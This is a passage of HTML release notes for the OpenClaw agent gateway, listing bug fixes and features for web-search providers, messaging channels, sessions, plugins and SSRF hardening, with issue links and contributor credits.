<p>Web search/config: validate explicit <code>tools.web.search.provider</code> values against bundled and installed plugin manifests, while warning for stale third-party plugin config. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123070790" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53092" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53092/hovercard" href="https://github.com/openclaw/openclaw/issues/53092">#53092</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>.</p>
</li>
<li>
<p>Web search/SearXNG: retry empty non-general category searches once with the general category, so unsupported category engines do not return empty results when general search has matches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343014523" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73552" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73552/hovercard" href="https://github.com/openclaw/openclaw/issues/73552">#73552</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Loukky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Loukky">@Loukky</a>.</p>
</li>
<li>
<p>CLI/message: skip gateway-stop hooks for read-only <code>message read</code> and bound stop-hook shutdown for other message actions, so one-shot Discord reads cannot hang behind plugin lifecycle cleanup.</p>
</li>
<li>
<p>Plugins/web-provider: cache repeated bundled web search and web fetch provider registry loads by default while preserving explicit cache opt-outs. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368302945" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75992" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75992/hovercard" href="https://github.com/openclaw/openclaw/pull/75992">#75992</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Agents/sandbox: preserve existing workspace file modes when sandbox edits atomically replace files, so 0644 files do not collapse to 0600 after Write/Edit/apply_patch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4064748597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44077" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44077/hovercard" href="https://github.com/openclaw/openclaw/issues/44077">#44077</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/patosullivan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/patosullivan">@patosullivan</a>.</p>
</li>
<li>
<p>Control UI/WebChat: route typed <code>/new</code> through the New Chat dashboard-session creation flow instead of <code>chat.send</code>, while keeping <code>/reset</code> as the explicit current-session reset. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4300356598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69599" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69599/hovercard" href="https://github.com/openclaw/openclaw/issues/69599">#69599</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</p>
</li>
<li>
<p>Agents/models: keep legacy CLI runtime model refs such as <code>claude-cli/*</code> in the configured allowlist after canonical runtime migration, so cron <code>payload.model</code> overrides keep working. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365669096" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75753/hovercard" href="https://github.com/openclaw/openclaw/issues/75753">#75753</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RyanSandoval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RyanSandoval">@RyanSandoval</a>.</p>
</li>
<li>
<p>Codex/app-server: restart the shared Codex app-server client once when it closes during startup thread resume, preserving the existing thread binding instead of retrying <code>thread/start</code> on a closed client. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/watch: keep colored subsystem log prefixes in the managed tmux pane even when the parent shell exports <code>NO_COLOR</code>, while preserving explicit <code>FORCE_COLOR=0</code> opt-out. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Agents/compaction: submit a non-empty runtime-event marker for pre-compaction memory flush turns, so strict Anthropic providers no longer reject the silent flush as an empty user message. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361911066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75305" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75305/hovercard" href="https://github.com/openclaw/openclaw/issues/75305">#75305</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sableassistant3777-source/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sableassistant3777-source">@sableassistant3777-source</a>.</p>
</li>
<li>
<p>Plugin SDK: re-export <code>isPrivateIpAddress</code> from <code>plugin-sdk/ssrf-runtime</code>, restoring source-checkout builds for SearXNG and Firecrawl private-network guards. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/message actions: advertise <code>upload-file</code> and route it through Discord's send runtime with agent-scoped media reads, so agents can discover and send file attachments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203171087" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60652/hovercard" href="https://github.com/openclaw/openclaw/issues/60652">#60652</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204560464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60808" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60808/hovercard" href="https://github.com/openclaw/openclaw/pull/60808">#60808</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206054244" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61087" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61087/hovercard" href="https://github.com/openclaw/openclaw/pull/61087">#61087</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206088150" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61100" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61100/hovercard" href="https://github.com/openclaw/openclaw/pull/61100">#61100</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/claw-io/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/claw-io">@claw-io</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joelnishanth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joelnishanth">@joelnishanth</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sjhddh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sjhddh">@sjhddh</a>.</p>
</li>
<li>
<p>Sessions: suppress exact inter-session control replies such as <code>NO_REPLY</code> and keep agent-to-agent announce bookkeeping out of visible transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123622416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53145" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53145/hovercard" href="https://github.com/openclaw/openclaw/issues/53145">#53145</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TarahAssistant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TarahAssistant">@TarahAssistant</a>.</p>
</li>
<li>
<p>CLI/directory: report unsupported directory operations for installed channel plugins instead of prompting to reinstall the plugin when it lacks a directory adapter. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365917479" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75770" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75770/hovercard" href="https://github.com/openclaw/openclaw/issues/75770">#75770</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lawong888/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lawong888">@lawong888</a>.</p>
</li>
<li>
<p>Web search/SearXNG: show the JSON API <code>search.formats</code> prerequisite during SearXNG setup before prompting for the base URL. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4250289649" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65592" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65592/hovercard" href="https://github.com/openclaw/openclaw/pull/65592">#65592</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/evanpaul14/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/evanpaul14">@evanpaul14</a>.</p>
</li>
<li>
<p>Web search/SearXNG: pass through <code>img_src</code> image URLs from SearXNG image-category results. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207995751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61416" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61416/hovercard" href="https://github.com/openclaw/openclaw/pull/61416">#61416</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sghael/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sghael">@sghael</a>.</p>
</li>
<li>
<p>Web search/Kimi: fail explicitly when Moonshot returns an ungrounded chat answer instead of native web-search evidence, so Kimi no longer reports generic fallback text as a successful search. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117727594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52573" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52573/hovercard" href="https://github.com/openclaw/openclaw/issues/52573">#52573</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wangwllu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wangwllu">@wangwllu</a>.</p>
</li>
<li>
<p>Web search: keep public provider requests on the strict SSRF guard and reserve private-network access for explicit self-hosted SearXNG/Firecrawl endpoints. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350921258" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74357" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74357/hovercard" href="https://github.com/openclaw/openclaw/issues/74357">#74357</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350976183" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74360" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74360/hovercard" href="https://github.com/openclaw/openclaw/pull/74360">#74360</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fede-kamel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fede-kamel">@fede-kamel</a>.</p>
</li>
<li>
<p>Firecrawl: reject private, loopback, metadata, and non-HTTP(S) <code>firecrawl_scrape</code> target URLs before forwarding them to Firecrawl. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4081587848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48133" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48133/hovercard" href="https://github.com/openclaw/openclaw/pull/48133">#48133</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kn1ghtc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kn1ghtc">@kn1ghtc</a>.</p>
</li>
<li>
<p>Web search/Firecrawl: allow self-hosted private/internal Firecrawl <code>baseUrl</code> endpoints, including HTTP for private targets, while keeping hosted Firecrawl on the strict official endpoint. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4234128169" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63877/hovercard" href="https://github.com/openclaw/openclaw/issues/63877">#63877</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4194271236" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59666" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59666/hovercard" href="https://github.com/openclaw/openclaw/pull/59666">#59666</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235261313" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63941" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63941/hovercard" href="https://github.com/openclaw/openclaw/pull/63941">#63941</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347547141" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74013" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74013/hovercard" href="https://github.com/openclaw/openclaw/pull/74013">#74013</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jhthompson12/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jhthompson12">@jhthompson12</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jzakirov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jzakirov">@jzakirov</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mlightsnow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mlightsnow">@Mlightsnow</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shad0wca7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shad0wca7">@shad0wca7</a>.</p>
</li>
<li>
<p>CLI/models: report gateway model fallback attempts in <code>infer model run --json</code> and avoid double-prefixing provider-qualified defaults such as <code>openrouter/auto</code> in <code>models status</code>. Partially fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299726655" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69527" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69527/hovercard" href="https://github.com/openclaw/openclaw/issues/69527">#69527</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexifra/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexifra">@alexifra</a>.</p>
</li>
<li>
<p>Providers/OpenRouter: strip trailing assistant prefill turns from verified OpenRouter Anthropic model requests when reasoning is enabled, so Claude 4.6 routes no longer fail with Anthropic's prefill rejection through the OpenAI-compatible adapter. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362626247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75395" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75395/hovercard" href="https://github.com/openclaw/openclaw/issues/75395">#75395</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sbmilburn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sbmilburn">@sbmilburn</a>.</p>
</li>
<li>
<p>Voice Call: add per-number inbound routing for dialed-number greetings, response agents/models/prompts, and TTS voice overrides. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161590255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56604" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56604/hovercard" href="https://github.com/openclaw/openclaw/issues/56604">#56604</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/healthstatus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/healthstatus">@healthstatus</a>.</p>
</li>
<li>
<p>Feishu: preserve Feishu/Lark HTTP error bodies for message sends, media sends, and chat member lookups, so HTTP 400 failures include vendor code, message, log id, and troubleshooter details. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346852455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73860" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73860/hovercard" href="https://github.com/openclaw/openclaw/issues/73860">#73860</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/desksk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/desksk">@desksk</a>.</p>
</li>
<li>
<p>Agents/transcripts: avoid reopening large Pi transcript files through the synchronous session manager for maintenance rewrites, persisted tool-result truncation, manual compaction boundary hardening, and queued compaction rotation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>Web search/Exa: accept <code>plugins.entries.exa.config.webSearch.baseUrl</code>, normalize it to the Exa <code>/search</code> endpoint, and partition cached results by endpoint. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4140768584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54928" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54928/hovercard" href="https://github.com/openclaw/openclaw/issues/54928">#54928</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4140867375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54939" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54939/hovercard" href="https://github.com/openclaw/openclaw/pull/54939">#54939</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mrpl327/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mrpl327">@mrpl327</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lyfuci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lyfuci">@lyfuci</a>.</p>
</li>
<li>
<p>Web search/MiniMax: include MiniMax Search in the web-search setup flow and let <code>MINIMAX_API_KEY</code> participate in MiniMax Search auto-detection. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252993330" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65828" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65828/hovercard" href="https://github.com/openclaw/openclaw/pull/65828">#65828</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: preserve official source-linked trust through archive installs, so OpenClaw can install trusted ClawHub plugin packages that trigger the built-in dangerous-pattern scanner. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: install package runtime dependencies for archive-backed plugin installs, so ClawHub packages such as WhatsApp load declared dependencies after download. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/tools: cache repeated plugin tool factory results only for matching request context, reducing per-turn tool prep without leaking sandbox, session, browser, delivery, or runtime config state. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367960262" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75956/hovercard" href="https://github.com/openclaw/openclaw/issues/75956">#75956</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</p>
</li>
<li>
<p>Providers/LM Studio: allow <code>models.providers.lmstudio.params.preload: false</code> to skip OpenClaw's native model-load call so LM Studio JIT loading, idle TTL, and auto-evict can own model lifecycle. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367728807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75921" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75921/hovercard" href="https://github.com/openclaw/openclaw/issues/75921">#75921</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/garyd9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/garyd9">@garyd9</a>.</p>
</li>
<li>
<p>Agents/transcripts: keep chat history, restart recovery, fork token checks, and stale-token compaction checks on bounded async transcript reads or cached async indexes instead of reparsing large session files. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>Telegram: inherit the process DNS result order for Bot API transport and downgrade recovered sticky IPv4 fallback promotions to debug logs, while keeping pinned-IP escalation warnings visible. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367563919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75904" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75904/hovercard" href="https://github.com/openclaw/openclaw/issues/75904">#75904</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/highfly-hi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/highfly-hi">@highfly-hi</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</p>
</li>
<li>
<p>Sessions: keep durable external conversation pointers, including group and thread-scoped chat sessions, out of age, count, and disk-budget maintenance eviction while still allowing synthetic runtime entries to age out. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175356638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58088" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58088/hovercard" href="https://github.com/openclaw/openclaw/issues/58088">#58088</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drinkflav/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drinkflav">@drinkflav</a>.</p>
</li>
<li>
<p>Web search/MiniMax: allow <code>MINIMAX_OAUTH_TOKEN</code> to satisfy MiniMax Search credentials, so OAuth-authorized MiniMax Token Plan setups do not need a separate web-search key. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252008941" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65768" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65768/hovercard" href="https://github.com/openclaw/openclaw/issues/65768">#65768</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kikibrian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kikibrian">@kikibrian</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhouhe-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhouhe-xydt">@zhouhe-xydt</a>.</p>
</li>
<li>
<p>Providers/MiniMax: derive Coding Plan usage polling from the configured MiniMax base URL, so global setups no longer query the CN usage host. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246049228" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65054" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65054/hovercard" href="https://github.com/openclaw/openclaw/issues/65054">#65054</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sixone74/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sixone74">@sixone74</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Yanhu007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Yanhu007">@Yanhu007</a>.</p>
</li>
<li>
<p>Control UI/WebChat: skip assistant-media transcript supplements when stale media refs resolve to no playable media, so text-only final replies are not stored a second time as gateway-injected assistant messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347391100" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73956/hovercard" href="https://github.com/openclaw/openclaw/issues/73956">#73956</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>.</p>
</li>
<li>
<p>Sessions: reject <code>sessions_send</code> targets that resolve to thread-scoped chat sessions, so inter-agent coordination cannot be injected into active human-facing Slack or Discord threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117274546" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52496" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52496/hovercard" href="https://github.com/openclaw/openclaw/issues/52496">#52496</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barry-p5cc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barry-p5cc">@barry-p5cc</a>.</p>
</li>
<li>
<p>Subagents: honor <code>sessions_spawn</code> with <code>expectsCompletionMessage: false</code> by skipping parent completion handoff delivery while still running child cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367072418" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75848" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75848/hovercard" href="https://github.com/openclaw/openclaw/issues/75848">#75848</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</p>
</li>
<li>
<p>Media/completions: treat media-only message-tool sends as delivered async completion output, avoiding duplicate raw <code>MEDIA:</code> fallback posts after video or music generation finishes.</p>
</li>
<li>
<p>Gateway/logging: keep deferred channel startup logs on the subsystem logger, so Slack, Discord, Telegram, and voice-call startup messages keep timestamped prefixes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Codex/app-server: recover JSON-RPC frames split by raw command-output newlines and include a redacted preview when malformed app-server messages still reach the console. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
